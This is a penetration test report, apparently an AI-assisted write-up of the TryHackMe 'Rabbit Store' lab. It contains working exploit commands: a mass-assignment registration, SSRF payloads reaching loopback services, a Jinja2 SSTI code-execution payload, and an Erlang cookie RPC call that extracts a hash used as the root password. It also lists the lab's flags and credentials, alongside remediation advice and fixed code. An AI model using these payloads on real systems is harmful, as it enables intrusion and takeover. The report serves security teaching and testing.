PeachStudio

Penetration Test Report: Rabbit Store

Target: 10.81.168.19 (TryHackMe - Rabbit Store)
Assessment Date: 2026-01-30
Classification: Confidential


Table of Contents

  1. Executive Summary
  2. Scope and Methodology
  3. Attack Chain Overview
  4. Vulnerability Findings
  5. Detailed Exploitation Path
  6. Remediation Recommendations
  7. Appendix: Technical Evidence

Executive Summary

A penetration test was conducted against the Rabbit Store web application. The assessment identified four chained vulnerabilities that allowed complete system compromise:

| Severity | Count | Impact |
|---|---|---|
| Critical | 2 | Remote Code Execution, Privilege Escalation to Root |
| High | 2 | Subscription/Authorization Bypass, Internal Service Access |

Key Findings:

  • Mass assignment vulnerability allows subscription bypass
  • SSRF vulnerability exposes internal RabbitMQ management interface
  • Server-Side Template Injection (SSTI) enables remote code execution
  • Erlang cookie exposure combined with weak credential storage allows root access

Final Impact: Full system compromise with root-level access achieved.


Scope and Methodology

Target Systems

| Host | Services | Status |
|---|---|---|
| 10.81.168.19 | SSH (22), HTTP (80), EPMD (4369), Erlang distribution for RabbitMQ (25672) | Compromised |

Virtual Hosts Discovered

  • cloudsite.thm - Main marketing site
  • storage.cloudsite.thm - Storage application with authentication

Methodology

  1. Network reconnaissance and service enumeration
  2. Web application analysis and API endpoint discovery
  3. Vulnerability identification and exploitation
  4. Privilege escalation to root
  5. Flag retrieval and documentation

Attack Chain Overview

┌─────────────────────┐
│  1. Mass Assignment │
│  Bypass subscription│
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  2. SSRF Attack     │
│  Access internal    │
│  services           │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  3. SSTI (RCE)      │
│  Shell as azrael    │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  4. Erlang RPC      │
│  Extract RabbitMQ   │
│  credentials        │
└──────────┬──────────┘
           │
           ▼
┌─────────────────────┐
│  5. Root Access     │
│  su with extracted  │
│  password hash      │
└─────────────────────┘

Vulnerability Findings

Critical Vulnerabilities

VULN-01: Server-Side Template Injection (SSTI)

Severity: Critical (CVSS 9.8)
Location: POST /api/fetch_messeges_from_chatbot
Affected Component: Flask chatbot service (port 8000)

Description: The chatbot endpoint splices the user-supplied username into the template source and renders it with Jinja2's render_template_string(). Template expressions in the input are therefore evaluated server-side, and Jinja2's access to Python object internals turns this into arbitrary Python code execution as the service account.

Reproduction:

# 1. Obtain a valid JWT with an active subscription (see VULN-03)
JWT="<valid_jwt_token>"

# 2. Execute arbitrary commands via SSTI
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -H "Cookie: jwt=$JWT" \
  -d '{"username":"{{config.__class__.__init__.__globals__[\"os\"].popen(\"id\").read()}}"}' \
  "http://10.81.168.19/api/fetch_messeges_from_chatbot"

# Response contains: uid=1000(azrael) gid=1000(azrael)

Impact:

  • Remote code execution as user azrael
  • Access to local filesystem and internal network
  • Lateral movement capability

VULN-02: Insecure Credential Storage Leading to Privilege Escalation

Severity: Critical (CVSS 9.1)
Location: RabbitMQ internal user database
Affected Component: System authentication

Description: RabbitMQ stores each user's password as a 36-byte value: a 4-byte random salt followed by SHA-256(salt ++ password). The Linux root password on this host is the hex encoding of that 32-byte SHA-256 portion of the RabbitMQ "root" user's hash. Because the Erlang cookie in /var/lib/rabbitmq/.erlang.cookie is readable by the low-privileged user, any local user can join the Erlang distribution, call into the RabbitMQ node over RPC, read the hash from the internal database, and log in as root.

Reproduction:

# 1. Copy RabbitMQ's Erlang cookie (readable at /var/lib/rabbitmq/.erlang.cookie)
#    into azrael's home. -setcookie below is sufficient on its own; the file
#    just lets other Erlang tooling pick the cookie up automatically.
echo "1uvTm244k7jSLEga" > /home/azrael/.erlang.cookie
chmod 400 /home/azrael/.erlang.cookie

# 2. Join the Erlang distribution (epmd on 4369 must be reachable and the short
#    node name must resolve locally) and call the internal auth backend
erl -noinput -sname test -setcookie 1uvTm244k7jSLEga \
  -eval "io:format(\"~p~n\", [rpc:call(rabbit@forge, rabbit_auth_backend_internal, lookup_user, [<<\"root\">>])])" \
  -s init stop

# 3. The password_hash field is a 36-byte binary: 4-byte salt (bytes 1-4)
#    followed by SHA-256(salt ++ password) (bytes 5-36). Take bytes 5-36 as hex.
# Full hash: e3d7ba85295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585
# Password:  295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585

# 4. Switch to root (the hex digest is the literal Linux password)
echo "295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585" | su - root

Impact:

  • Complete system compromise
  • Access to all data and services
  • Ability to establish persistence

High Severity Vulnerabilities

VULN-03: Mass Assignment in User Registration

Severity: High (CVSS 8.1)
Location: POST /api/register
Affected Component: User registration API

Description: The registration endpoint copies the whole request body into the new user record, including the server-controlled subscription field. An attacker can therefore register with "subscription":"active" and receive a JWT that already carries premium status, without ever going through the payment flow.

Reproduction:

# Register with elevated subscription
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@test.com","password":"Test123!","subscription":"active"}' \
  "http://10.81.168.19/api/register"

# Login to receive a JWT with active subscription (-c - writes the cookie jar to stdout so the jwt cookie is visible)
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -d '{"email":"attacker@test.com","password":"Test123!"}' \
  "http://10.81.168.19/api/login" -c -

Impact:

  • Bypass payment/subscription system
  • Access to premium features without authorization
  • Enables exploitation of authenticated endpoints
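
The quickest check that the mass assignment actually took effect is to read the claims out of the returned JWT: the payload segment is only base64url-encoded, so no key is needed to inspect it. The block below is an added example for this report, not code from the Rabbit Store application; it assumes the server puts the subscription status in a claim literally named "subscription" (the page only says the token carries an active subscription), and it builds a constructed HS256 token with a made-up secret so the check can be exercised offline.

```python
import base64
import hashlib
import hmac
import json


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    # JWT segments drop the '=' padding; restore it before decoding
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token: str) -> dict:
    """Return the payload claims WITHOUT verifying the signature.

    This is the client-side check: it shows what the server issued. Only the
    server needs the key, because only the server must trust the signature.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected header.payload.signature)")
    return json.loads(_b64url_decode(parts[1]))


def has_active_subscription(token: str) -> bool:
    # Assumed claim name "subscription"; the report only says the JWT
    # reflects the subscription status set at registration.
    return decode_jwt_claims(token).get("subscription") == "active"


def sign_hs256(claims: dict, secret: bytes) -> str:
    """Mint an HS256 token. Used here only to construct a sample token offline."""
    header = _b64url_encode(
        json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode()
    )
    body = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{_b64url_encode(sig)}"


def verify_hs256(token: str, secret: bytes) -> bool:
    """Server-side counterpart: constant-time signature check."""
    header, body, sig = token.split(".")
    expected = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return hmac.compare_digest(_b64url_decode(sig), expected)


# Constructed sample (not a token from the target): what the server might issue
# after the VULN-03 registration with "subscription":"active".
DEMO_SECRET = b"constructed-demo-secret"
DEMO_TOKEN = sign_hs256(
    {"email": "attacker@test.com", "subscription": "active"}, DEMO_SECRET
)

if __name__ == "__main__":
    print(decode_jwt_claims(DEMO_TOKEN))
    print("active subscription:", has_active_subscription(DEMO_TOKEN))
```

To use it against the real target, paste the value of the jwt cookie from the login response into decode_jwt_claims(); if the subscription claim is not "active", the server ignored the injected field and the finding does not reproduce.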

VULN-04: Server-Side Request Forgery (SSRF)

Severity: High (CVSS 7.5)
Location: POST /api/store-url
Affected Component: URL fetch functionality

Description: The store-url endpoint fetches whatever URL the authenticated user supplies, from the server's own network position. Its only protection is a string match on the hostname that rejects "localhost" and "127.0.0.1"; any other spelling of the local host passes, so 0.0.0.0 (which the kernel routes to the local machine) and the IPv6 loopback [::1] reach services bound only to loopback.

Reproduction:

# Access internal RabbitMQ management (port 15672)
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -H "Cookie: jwt=$JWT" \
  -d '{"url":"http://0.0.0.0:15672/"}' \
  "http://10.81.168.19/api/store-url"

# Access internal Flask chatbot (port 8000)
curl -X POST -H "Host: storage.cloudsite.thm" \
  -H "Content-Type: application/json" \
  -H "Cookie: jwt=$JWT" \
  -d '{"url":"http://[::1]:8000/"}' \
  "http://10.81.168.19/api/store-url"

Impact:

  • Access to internal services not exposed externally
  • Port scanning of internal network
  • Potential access to cloud metadata endpoints
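
The bypass works because the filter compares strings, not addresses. The block below is an added example written for this report (not code from the Rabbit Store application): it reimplements the denylist as the finding describes it, then shows the address-based check the remediation section calls for, which classifies every literal or resolved address with the ipaddress module, including 0.0.0.0, ::1 and the IPv4-mapped form ::ffff:127.0.0.1. The DEMO_DNS table and demo_resolver are constructed so the example runs offline; system_resolver is what you would plug in for real.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# The store-url filter as VULN-04 describes it: a string match on two names.
DENYLIST = {"localhost", "127.0.0.1"}


def naive_filter_allows(url: str) -> bool:
    host = (urlsplit(url).hostname or "").lower()
    return host not in DENYLIST


def _is_internal(addr) -> bool:
    # Fold IPv4-mapped IPv6 (::ffff:127.0.0.1) back to IPv4 before classifying,
    # since older Python versions do not propagate is_loopback through the mapping.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (
        addr.is_loopback        # 127.0.0.0/8, ::1
        or addr.is_unspecified  # 0.0.0.0, ::
        or addr.is_private      # RFC 1918, fc00::/7, ...
        or addr.is_link_local   # 169.254.0.0/16 (cloud metadata lives here), fe80::/10
        or addr.is_multicast
        or addr.is_reserved
    )


def system_resolver(host: str) -> set:
    """Real resolver: every address the OS would connect to for this name."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


# Constructed lookup table so the example runs without DNS (not real records).
DEMO_DNS = {
    "storage.cloudsite.thm": ["10.81.168.19"],  # the target itself, RFC 1918
    "example.com": ["93.184.216.34"],
    "0": ["0.0.0.0"],  # getaddrinfo() accepts shorthand like this too
}


def demo_resolver(host: str) -> set:
    if host not in DEMO_DNS:
        raise socket.gaierror(f"constructed resolver has no entry for {host!r}")
    return set(DEMO_DNS[host])


def hardened_filter_allows(url: str, resolver=system_resolver) -> bool:
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False  # no file://, gopher://, dict:// and friends
    host = parts.hostname
    if not host:
        return False
    try:
        addrs = {ipaddress.ip_address(host)}  # literal in any notation
    except ValueError:
        try:
            addrs = {ipaddress.ip_address(a) for a in resolver(host)}
        except (socket.gaierror, ValueError):
            return False  # unresolvable names are rejected, not waved through
    # Every resolved address must be external; one internal A/AAAA record is enough to block.
    return bool(addrs) and not any(_is_internal(a) for a in addrs)


if __name__ == "__main__":
    for u in ("http://0.0.0.0:15672/", "http://[::1]:8000/", "http://127.0.0.1/"):
        print(u, "naive:", naive_filter_allows(u), "hardened:", hardened_filter_allows(u))
```

Two caveats remain even with the hardened check. The address is classified before the fetch, so DNS rebinding (a name that resolves externally once and to 127.0.0.1 a moment later) and an HTTP redirect to an internal URL can still reach loopback; the fetch must be done with redirects disabled and the check repeated on the address actually connected to. The allowlist of permitted external domains recommended under VULN-04 avoids both problems, and is the right design when the legitimate use case is narrow.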

Detailed Exploitation Path

Phase 1: Initial Access

Objective: Gain authenticated access to the storage application

  1. Discovered virtual hosts via HTTP redirects
  2. Identified API endpoints through JavaScript analysis
  3. Exploited mass assignment to register with active subscription
  4. Obtained valid JWT for authenticated requests

Phase 2: Internal Reconnaissance via SSRF

Objective: Map internal services

Discovered services:

| Port | Service | Accessible via SSRF |
|---|---|---|
| 5672 | RabbitMQ AMQP | Yes (bound to localhost only) |
| 8000 | Flask Chatbot | Yes (SSTI target) |
| 15672 | RabbitMQ Management | Yes (requires authentication) |

Phase 3: Remote Code Execution

Objective: Obtain shell access

  1. Identified SSTI vulnerability in chatbot endpoint
  2. Confirmed Jinja2 template engine via {{7*7}} returning 49
  3. Achieved RCE using Python os.popen() payload
  4. Retrieved user flag: 98d3a30fa86523c580144d317be0c47e

Phase 4: Privilege Escalation

Objective: Escalate to root

  1. Located Erlang cookie at /var/lib/rabbitmq/.erlang.cookie
  2. Copied cookie to azrael's home directory
  3. Connected to RabbitMQ via Erlang RPC
  4. Extracted root user's password hash from internal database
  5. Identified a hint indicating the Linux root password equals the hex SHA-256 portion of the RabbitMQ hash
  6. Used su - root with extracted hash as password
  7. Retrieved root flag: eabf7a0b05d3f2028f3e0465d2fd0852
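
The "Python - Hash conversion" step behind VULN-02 and Phase 4 above is shown here as an added example written for this report (not a script from the engagement): it parses the <<227,215,...>> binary literal that io:format("~p") prints for the password_hash field, splits the 36 bytes into salt and digest, and implements RabbitMQ's SHA-256 scheme (stored value = salt ++ SHA-256(salt ++ password), base64-encoded where rabbitmqctl or a definitions export shows it) so a candidate password can be verified against the recovered hash without touching the broker. The hash constant is the value from this report; the demo password is constructed and is not the target's RabbitMQ password.

```python
import base64
import hashlib
import hmac
import os
import re

# Value recovered over Erlang RPC in VULN-02, transcribed as hex
RABBIT_ROOT_HASH_HEX = (
    "e3d7ba85295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585"
)

SALT_LEN = 4      # rabbit_password_hashing_sha256 prepends a 4-byte random salt
DIGEST_LEN = 32   # SHA-256(salt ++ password)


def erlang_binary_to_bytes(literal: str) -> bytes:
    """Parse the <<227,215,...>> form io:format("~p") uses for a non-printable binary."""
    m = re.fullmatch(r"\s*<<\s*([0-9,\s]*)>>\s*", literal)
    if not m:
        raise ValueError("not an Erlang binary literal")
    body = m.group(1).strip()
    return bytes(int(x) for x in body.split(",")) if body else b""


def decode_stored_hash(value: str) -> bytes:
    """Accept hex (as transcribed in this report) or base64 (rabbitmqctl / definitions export)."""
    value = value.strip()
    raw = bytes.fromhex(value) if len(value) == 2 * (SALT_LEN + DIGEST_LEN) \
        else base64.b64decode(value, validate=True)
    if len(raw) != SALT_LEN + DIGEST_LEN:
        raise ValueError(f"expected {SALT_LEN + DIGEST_LEN} bytes, got {len(raw)}")
    return raw


def stored_hash_to_base64(raw: bytes) -> str:
    """The form RabbitMQ itself shows (e.g. in a definitions export)."""
    return base64.b64encode(raw).decode()


def split_hash(raw: bytes) -> tuple:
    return raw[:SALT_LEN], raw[SALT_LEN:]


def rabbit_hash_password(password: str, salt: bytes = None) -> bytes:
    """Compute a RabbitMQ SHA-256 password hash; random salt unless one is given."""
    salt = os.urandom(SALT_LEN) if salt is None else salt
    return salt + hashlib.sha256(salt + password.encode("utf-8")).digest()


def rabbit_verify(stored: bytes, candidate: str) -> bool:
    """Offline check of a candidate against a recovered hash (constant-time compare)."""
    salt, _ = split_hash(stored)
    return hmac.compare_digest(rabbit_hash_password(candidate, salt), stored)


def linux_password_from_hash(raw: bytes) -> str:
    # Finding VULN-02 on this host: the root login password is the hex digest, salt stripped
    return split_hash(raw)[1].hex()


if __name__ == "__main__":
    raw = decode_stored_hash(RABBIT_ROOT_HASH_HEX)
    salt, digest = split_hash(raw)
    print("salt:          ", salt.hex())
    print("sha256 portion:", digest.hex())
    print("base64 form:   ", stored_hash_to_base64(raw))
    # Constructed demo password, hashed with the same salt, to show verification works
    demo = rabbit_hash_password("constructed-demo-password", salt)
    print("verify demo:   ", rabbit_verify(demo, "constructed-demo-password"))
```

Because the salt is only 4 bytes and the construction is a single unsalted-speed SHA-256, a recovered RabbitMQ hash is cheap to attack offline with a wordlist; that is a second reason, beyond the cookie exposure, to keep the internal user database away from low-privileged accounts.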

Remediation Recommendations

Critical Priority

| Vulnerability | Remediation |
|---|---|
| SSTI (VULN-01) | Never pass user input to render_template_string() as template source. Use a fixed template with render_template() and pass dynamic values as context variables, which are escaped by default. |
| Credential Storage (VULN-02) | Use unique, randomly generated passwords for each service. Never derive system passwords from application credentials. Restrict the Erlang cookie file to the rabbitmq user only and rotate it, since it has already been read. |

High Priority

| Vulnerability | Remediation |
|---|---|
| Mass Assignment (VULN-03) | Implement allowlist validation for registration fields. Only accept email and password; reject or ignore all other fields. |
| SSRF (VULN-04) | Validate the destination address, not the hostname string: resolve the name, check every resolved address against all local and internal ranges (127.0.0.0/8, 0.0.0.0, ::1, ::ffff:127.0.0.1, RFC 1918, 169.254.0.0/16), reject non-HTTP schemes, and disable redirects. Prefer an allowlist of permitted external domains. |

Code Fixes

SSTI Fix (chatbot.py):

# Before (vulnerable): user input becomes part of the template source,
# so any {{ ... }} in `username` is evaluated by Jinja2
template = '...{}'.format(username)
return render_template_string(template)

# After (secure): the template is fixed; user input is only a context value.
# render_template() autoescapes .html templates, so escape() is belt-and-braces.
return render_template('greeting.html', username=escape(username))

Mass Assignment Fix (registration):

// Before (vulnerable)
const user = await User.create(req.body);

// After (secure)
const { email, password } = req.body;
const user = await User.create({
  email,
  password,
  subscription: 'inactive'  // Always default
});

Appendix: Technical Evidence

Flags Retrieved

| Flag | Value | Location |
|---|---|---|
| User | 98d3a30fa86523c580144d317be0c47e | /home/azrael/user.txt |
| Root | eabf7a0b05d3f2028f3e0465d2fd0852 | /root/root.txt |

Credentials Discovered

| Service | Username | Credential |
|---|---|---|
| Linux | root | 295d1d16a2617df6f7e6630527ff2f1ebb5c43b3f6ec614811ed194f98073585 |
| RabbitMQ | root | SHA-256 salted hash (see VULN-02) |
| Erlang | - | Cookie: 1uvTm244k7jSLEga |

Tools Used

  • Nmap - Network scanning
  • curl - HTTP requests
  • Kali Linux MCP - Command execution
  • Python - Hash conversion

Report Information

Prepared By: Claude (AI-Assisted) | Human Review: Vito Rallo | Date: 2026-01-30
Principle: Human in the Loop | Version: 1.0


PEACH STUDIO | Where AI and Cybersecurity Collide | www.peachstudio.be